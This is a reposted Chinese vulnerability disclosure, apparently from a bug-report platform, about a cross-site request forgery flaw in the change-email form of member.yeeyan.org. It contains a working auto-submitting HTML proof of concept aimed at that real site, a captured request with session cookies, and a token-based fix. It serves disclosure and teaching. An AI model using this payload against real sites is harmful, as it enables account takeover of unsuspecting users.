来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 由于网页表单验证不严格,导致可以提交恶意用户信息,网站用户面板中有一个功能是更换用户邮箱,这个表单可以被恶意提交不属于当前用户的邮件地址。详细说明:htmlH2CSRF Exploit...
由于网页表单验证不严格,导致可以提交恶意用户信息,网站用户面板中有一个功能是更换用户邮箱,这个表单可以被恶意提交不属于当前用户的邮件地址。
详细说明:
<html>
<H2>CSRF Exploit to add </H2>
<body>
<form accept-charset="utf-8" method="POST" action="http://member.yeeyan.org/my/profile/email?" name="form0" enctype="multipart/form-data">
<input type="text" name="data[email]" value="your_email_address@domain.com" />
</form>
<script type="text/javascript">
document.form0.submit();
</script>
</body>
</html>
提交伪造数据的header 信息。
Request URL:http://member.yeeyan.org/my/profile/email?
Request Method:POST
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:UTF-8,*;q=0.5
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Content-Length:157
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryUBhOCXRqb1cABfRZ
Cookie:PHPSESSID=f6568962a1aafdfbf5719fa5d3400910; CakeCookie[ykey]=368997; __utma=68569166.1733295180.1354628709.1354813506.1354995318.3; __utmb=68569166.11.10.1354995318; __utmc=68569166; __utmz=68569166.1354813506.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E8%AF%91%E8%A8%80
Host:member.yeeyan.org
Origin:http://member.yeeyan.org
Referer:http://member.yeeyan.org/my/profile/email
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17
Request Payload
------WebKitFormBoundaryUBhOCXRqb1cABfRZ
Content-Disposition: form-data; name="data[email]"
email@domain.net
------WebKitFormBoundaryUBhOCXRqb1cABfRZ--
Response Headersview source
Connection:keep-alive
Content-Encoding:gzip
Content-Type:text/html
Date:Sat, 08 Dec 2012 19:44:04 GMT
P3P:CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server:nginx/0.8.47
Transfer-Encoding:chunked
Vary:Accept-Encoding
X-Powered-By:PHP/5.2.14
修复方案:
在表单中放置token,提交的时候从服务端验证。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com